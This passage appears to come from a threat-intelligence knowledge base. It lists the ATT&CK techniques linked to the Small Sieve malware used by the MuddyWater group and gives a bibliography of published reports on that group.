S1035 Small Sieve (Citation: DHS CISA AA22-055A MuddyWater February 2022) (Citation: GRAMDOOR) (Citation: Mandiant UNC3313 Feb 2022) (Citation: NCSC GCHQ Small Sieve Jan 2022) System Owner/User Discovery, Match Legitimate Resource Name or Location, System Network Configuration Discovery, Execution Guardrails, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Bidirectional Communication, Asymmetric Cryptography, Python, Windows Command Shell, Non-Standard Encoding, Web Protocols, Ingress Tool Transfer

References

  1. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
  2. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
  3. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
  4. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  5. Singh, S. et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  6. Malhotra, A. and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
  7. Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.
  8. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  9. Bohannon, D. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
  10. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  11. Lancaster, T. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
  12. Rostovcev, N. (2023, April 18). SimpleHarm: Tracking MuddyWater’s infrastructure. Retrieved July 11, 2024.
  13. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  14. Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.
  15. Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
  16. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  17. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  18. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
